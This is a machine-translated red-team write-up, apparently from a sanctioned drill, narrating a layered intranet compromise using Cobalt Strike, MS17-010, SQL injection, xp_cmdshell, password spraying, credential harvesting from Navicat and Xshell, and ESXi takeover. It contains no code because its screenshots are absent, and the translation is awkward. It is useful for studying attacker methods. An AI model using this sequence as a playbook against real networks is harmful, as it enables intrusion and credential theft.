Title: Infiltrate the third layer of the intranet into the working group’s intranet at one time [from 0 to 1 to break through all intranet machines]

Preface

During an offensive and defensive drill, the team first got a Webshell, and then bounced the permissions to CobaltStrike to facilitate me to intranet penetration:

By discovering that the current machine is a public network server, only the public network IP: xxx.xxx.xxx.16

By viewing the arp cache, I found that there are currently some public network machines:

By querying these IPs, it is found that it is a 'a network', and through Nbtscan, it is found that the current C segment has a host that survives: (It is initially determined that the current C segment machine may have a domain, but it is not sure)

Move horizontally the C segment of the current first layer of intranet machine

Since it is an offensive and defensive drill, the more points you get, the better. I don’t consider some other issues here. After getting the current machine, I caught the plaintext password:

However, using this password to use MSF to spray the C segment through password, it was found that no host was successfully horizontally:

At this moment, I scanned again to see if there is any MS17010: (Generally speaking, there are basically several Eternal Blues for this kind of 'Xiang.com', so just scan it)

I found that the three units 92, 151, and 200 existed in MS17010, and then called 92 this unit:

Then MSF and CS were linked, and I popped the MSF shell to Cs again and maintained permissions:

At this time, it is enough to use these two springboard machines. There is no need to continue to fight the other two MS17010. Then I collected information on the current C segment and scanned the web assets to survive and found a large number of web assets:

Through manual analysis, a SQL injection was found, and it was DBA permission:

Then an administrator user was added and then turned on 3389 (because of Norton, I don’t have time to do it for regular free kills, so I mainly got points, so I simply logged into the server directly)

And I can't connect directly through socks, which feels like a restriction. Later I found that using mstsc /admin can be logged in:

At this time, I used 92 this machine as a springboard to log in remotely to the 71 desktop:

The administrator's desktop was cloned:

At this time, log in to the previously added account and go to the remote desktop. It is the administrator's desktop:

Through a series of information collection and password collection, we obtained the permissions of Mssql and all side stations:

Through the collected password, continue spraying the password on segment C successfully. Mssql: xxx.xxx.xxx.239

Then, I directly call XP_cmdshell to execute the command, and found that the permissions are still very large:

Then use bitsadmin to go online to cs:

At this time, the permissions of these three machines: 16, 92, and 239 were obtained, but the intranet was not discovered yet, and I was caught in a bottleneck at this time.

After getting to this point, I found that it was impossible to move horizontally. I don’t want to use 0day to hit other webs. I turned around and used MS17010 to hit 200 this one:

Then, in the same way, the shell was popped to CS and the user was added and the remote desktop group was added:

Then login found that login failed:

At this time, using mstsc/admin can bypass and successfully log in to the target remote desktop:

The administrator's desktop was cloned in the same way:

I found a lot of valuable things, such as mstsc login records:

Get the navicat database credentials:

and found that there are many SSH in Xshell:

All Linux hosts can be logged in. At this time, you only need to use SharpDecryptPwd to grab their passwords, but a problem was found:

Use this thing to check the password later: (I didn’t want to use these things, so it’s too troublesome to check the password one by one)

I found that there are several machines with 10 intranets:

Use the existing password to spray the Linux host in segment C horizontally:

Then popped a few shells to MSF:

So far, the C segment of this public network has basically been penetrated, and a large number of core databases, switches, and web servers have been taken down. The next step is to intranet penetration of 10 intranets.

Intranet penetration from the second layer of intranet 10 segments

Because I have obtained the root password, I directly scanned the B section of 10.10.10.1/16. There are a large wave of assets. I won’t take a screenshot here. There are hundreds of them, and I found that there are ESXI:

And got an access control system:

took down two SSHs of 10 segments horizontally through special means, and found that the third layer of intranet is 192 segments and docker environment:

Since there is ESXI in 10 segments, I directly used the vulnerability to get the ESXI cloud platform, and all of its machines were accused:

At this time, the 10th section has basically been penetrated, and the next step is to penetrate the intranet of 192.

Intranet penetration from the third layer of intranet segment 192

I simply scanned the 192 paragraph through regular fscan and found that 192 assets are also very fat:

Then two vulnerabilities of MS17010 were found:

Now we have sorted out the relationship, and the current environment is as follows:

Original link: https://mp.weixin.qq.com/s?__biz=MzkxNDEwMDA4Mw==mid=2247491421idx=1sn=769d715d05057112eb4ee1ebb8312e37chksm=c172c541f6054c571e482d42 83f946625f2689ec6214e9d47a61c66399ee7d2cd2a62c0de464scene=123key=f3d6282f44b990e0f2527af4db8e088f25f3e43d0abaf5f845ff52e14965e4fe188c890